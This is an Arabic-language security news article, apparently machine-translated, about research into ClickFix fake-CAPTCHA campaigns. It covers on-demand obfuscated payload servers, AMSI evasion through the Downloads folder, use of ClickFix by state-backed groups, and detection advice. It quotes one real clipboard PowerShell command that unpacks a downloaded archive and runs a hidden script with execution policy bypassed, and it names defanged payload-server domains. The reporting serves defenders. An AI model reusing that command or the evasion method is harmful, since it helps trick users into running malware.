انقر فوقإصلاح، الحيلة التي تخدع الأشخاص لتشغيل البرامج الضارة يدويًا، أدت إلى نمو مكتب خلفي بهدوء.
يُظهر بحث جديد أن الأوامر الضارة وراء صفحات “تثبت أنك إنسان” المزيفة يتم توزيعها الآن بواسطة خوادم تعتمد على واجهة برمجة التطبيقات (API) والتي تمنح كل زائر نفس البرامج الضارة في تمويه مختلف. أظهر نفس البحث أيضًا طريقة تسليم جديدة تم تصميمها لتجاوز فحص البرامج النصية لنظام Windows.
قام الباحث الأمني Bert-Jan Pals بتفكيك العديد من منصات ClickFix وقام بتحليل ما يقرب من 3000 حمولة من الحملات المباشرة. وقد قدم النتائج في OrangeCon في أوائل يونيو ونشر التفاصيل في 30 يونيو.
ClickFix بسيط من حيث التصميم. تعرض الصفحة المفخخة اختبار CAPTCHA مزيفًا أو خطأ، وتقوم JavaScript المخفية بإسقاط أمر في الحافظة الخاصة بك، وتطلب منك الصفحة الضغط على مجموعة المفاتيح واللصق والضغط على Enter. يمكنك تشغيل البرامج الضارة بنفسك.
لا يوجد عادةً أي استغلال في الخطوة الأولى، وفي كثير من الأحيان لا يوجد ملف يمكن لبرنامج مكافحة الفيروسات التقليدي الإبلاغ عنه، لذا فإن عناصر التحكم في البريد الإلكتروني ونقطة النهاية التقليدية لا يمكن اكتشافها إلا بشكل أقل.
إنه يعمل بشكل جيد بما فيه الكفاية بحيث قامت شركة ESET بقياس قفزة بنسبة 517٪ من أواخر عام 2024 إلى النصف الأول من عام 2025، وقد وضعه تقرير الدفاع الرقمي لعام 2025 من Microsoft عند 47٪ من حالات الوصول الأولي التي شاهدها فريق Defender Experts.
تتمتع هذه التقنية الآن بمدخل خاص بها في MITRE ATT&CK, T1204.004.
الحمولات حسب الطلب
الجزء الجديد هو كيفية إنتاج الحمولات. وجد الأصدقاء الصفحات تسحب أوامرهم من خوادم الواجهة الخلفية التي تعمل كخدمة عند الطلب: فهم يتلقون الطلبات، ويتحققون من رمز الوصول، ويسجلون المتصل، ويعيدون أمرًا مشوشًا حديثًا في كل مرة.
لقد طلب من خادم واحد 100 حمولة وحصل على 100 حمولة مختلفة، ملفوفة في مزيج دوار من Base64 وAES وTripleDES وRijndael وDeflate. قم بإزالة الغلاف، وعلى الأقل في الوقت الحالي، سيتم تفكيكهم جميعًا إلى نفس البرنامج النصي، الذي يتم تشغيله في الذاكرة من خلال مساحة تشغيل PowerShell.
التنكر يمكن التخلص منه. البرامج الضارة الموجودة تحتها ليست كذلك، على الرغم من أن Pals يحذر من أن الحمولة الأساسية من المحتمل أن تبدأ في التغير لكل ضحية قبل فترة طويلة. تخدم نفس المنصة إغراءات بـ 25 لغة وتطابق الأمر مع نظام التشغيل الخاص بالزائر، مع تشغيل إصدارات macOS جنبًا إلى جنب مع Windows.

إن تسمية “كخدمة” ليست مجرد علامة تجارية. قامت ESET بتتبع المجرمين الذين يبيعون أدوات إنشاء ClickFix الجاهزة لمهاجمين آخرين. وقد وجد موقع Pals تسويقًا موازيًا أعمق بكثير، في كيفية إنتاج كل حمولة عند الطلب.
طريقة أكثر هدوءًا في: طريقة مجلد التنزيلات
النتيجة الثانية هي إجابة مباشرة للمدافعين الذين يشاهدون الحافظة. بدلاً من نسخ أمر ضار، تقوم الصفحات الأحدث بنسخ أمر يبدو غير ضار.

تقوم الصفحة بتنزيل ملف بهدوء إلى مجلد التنزيلات، وتحصل الحافظة على سطر “منسق” قصير ينقل هذا الملف، ويفك ضغطه، ويشغل البرنامج النصي بداخله. نظرًا لأن السطر الملصق هو ذلك المنسق فقط وليس الحمولة نفسها، فقد تم تصميمه لتجاوز AMSI، وهي ميزة Windows التي تتيح فحص البرامج النصية لمكافحة الفيروسات قبل تشغيلها. يوجد الرمز السيئ في الملف الذي تم تنزيله، على الجانب. يبدو خط الحافظة الذي تمت ملاحظته كما يلي:
powershell -C “$t=$env:TMP;Move-Item \”$HOME\Downloads\tmp.zip\” \”$t\7947.zip\”;tar -xf \”$t\7947.zip\” -C \”$t\”;conhost –headless powershell -ExecutionPolicy Bypass -File \”$t\tmp.ps1\” # \”* أنا ليس معرف التحقق reCAPTCHA لروبوت: 7947 *\””
لقد انجرف التنفيذ نحو التخفي أيضًا. طلب إغراء 2024 الأصلي من الأشخاص الضغط على Windows + R واللصق في مربع التشغيل. هناك إصدار أحدث، شائع حتى عام 2025 وحتى عام 2026، يوجههم إلى Windows+X وWindows Terminal بدلاً من ذلك. يبدو الاستخدام الطرفي أكثر اعتيادية، وعلى عكس مربع التشغيل، فإنه لا يترك أي أثر في مفتاح التسجيل RunMRU الذي يتحقق منه المحققون عادةً.
توقفت ClickFix عن كونها أداة للمجرمين فقط منذ فترة. وربطت Proofpoint المجموعات المدعومة من الدولة من روسيا وإيران وكوريا الشمالية، بما في ذلك APT28 وMuddyWater وKimsuky، بالحملات التي أسقطت ClickFix في سلاسل العدوى الحالية الخاصة بهم، كما قامت أطقم العمل الكورية الشمالية بإنشاء نسخة وهمية من “ClickFake Interview” لضرب العاملين في مجال العملات المشفرة.
لقد أنتجت الحيلة أقارب مسماين مثل FileFix و تنزيلFix التي تعتمد على أدوات Windows الموثوقة الأخرى. المقياس ليس نظريًا أيضًا: فقد وجدت شركة الأمن Expel موجة ClearFake التي من المحتمل أن تصيب ما يصل إلى 147,521 نظامًا منذ أواخر أغسطس 2025.
ما يجب على المدافعين مشاهدته
الدرس الدفاعي لم يتغير. التفاصيل لديها. الإشارات التي يمكن الاعتماد عليها هي سلاسل عملية، وليست نص الحافظة: Explorer.exe أو WindowsTerminal.exe إطلاق powershell.exe, cmd.exe، أو msiexec.exe والتواصل مع الشبكة مباشرة بعد ذلك.
كانت تلك هي أدوات الإطلاق الأكثر شيوعًا في بيانات Pals، حيث تعادل كل من PowerShell وcmd بحوالي 39% لكل منهما، وأغلق msiexec في الخلف بنسبة 34%.
EDR السلوكية، وقواعد التحكم في التطبيق التي تحد من البرامج التي يمكنها استدعاء مترجمي البرامج النصية، وتوجيهات المستخدم البسيطة (“لا تلصق أبدًا أمرًا طُلب منك تشغيله في مربع التشغيل أو المحطة الطرفية”) كلها لا تزال سارية. تضيف طريقة مجلد التنزيلات شيئًا آخر يجب البحث عنه: سطر واحد ذو مظهر بريء يمس مجلد التنزيلات ثم يولد PowerShell مخفيًا.
قام Pals أيضًا بإدراج ثلاثة خوادم حمولة تمت مشاهدتها أثناء البحث:
- com.comicstar[.]خطوط العرض
- babybon[.]كفد
- Merkantalolol[.]آسيا
والاتصال بأحد هؤلاء لا يثبت الإصابة. وهذا يعني أن الأمر قد تم وضعه على الأرجح في حافظة شخص ما.
كان حكم Pals على هذه التقنية صريحًا: “ClickFix موجود لتبقى”. النمط السائد في بحثه هو أن ClickFix يغير اللحظة التي يلحق فيها المدافعون بالركب، والانتقال من البرامج النصية لمرة واحدة إلى خوادم الحمولة عند الطلب هو ما يجعل هذا التكيف رخيصًا للتكرار.
والشيء التالي الذي يستحق المشاهدة هو ما إذا كانت البرامج الضارة نفسها، وليس غلافها فقط، تبدأ في التغير من ضحية إلى أخرى.
